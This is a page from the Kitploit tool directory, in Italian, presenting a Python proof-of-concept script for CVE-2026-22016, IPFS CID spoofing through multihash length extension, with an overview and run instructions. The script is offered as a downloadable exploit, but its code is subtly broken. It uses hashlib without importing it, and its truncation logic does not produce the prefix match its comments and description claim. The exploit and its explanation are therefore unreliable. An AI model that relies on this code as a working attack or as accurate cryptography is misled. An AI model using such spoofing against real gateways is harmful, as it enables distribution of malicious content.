Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — Prova di concetto in Python che dimostra lo spoofing di CID IPFS tramite estensione della lunghezza del multihash, evidenziando difetti di verifica del content-addressing che possono compromettere i gateway IPFS. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
Analisi delle VulnerabilitàExploitAnalisi HashSicurezza WebCrittografiaAttacco Avversario
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

Prova di concetto in Python che dimostra lo spoofing di CID IPFS tramite estensione della lunghezza del multihash, evidenziando difetti di verifica del content-addressing che possono compromettere i gateway IPFS.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
15 giorni faNon ancora revisionato

CVE-2026-22016 – Spoofing dei CID IPFS tramite estensione della lunghezza del multihash

Codice del programma (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – Spoofing dei CID IPFS tramite estensione della lunghezza del multihash

Severity: High

Panoramica

Un'implementazione IPFS si fida del campo di lunghezza nel multihash di un CID senza verificare che l'hash stesso corrisponda al contenuto completo. Un attaccante può creare un file il cui hash troncato corrisponde al prefisso dell'hash di un file legittimo e servire il file dannoso con lo stesso CID.

Dettagli della vulnerabilità

  • Tipo: Content Spoofing
  • Impatto: Distribuzione di contenuti dannosi, avvelenamento dei gateway IPFS.
  • Causa principale: La verifica del CID non controlla che la lunghezza del digest corrisponda all'output previsto della funzione hash.

Dimostrazione dell'exploit

Esegui lo script:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

Mostra che è possibile generare un CID spoofato.

Scarica lo strumento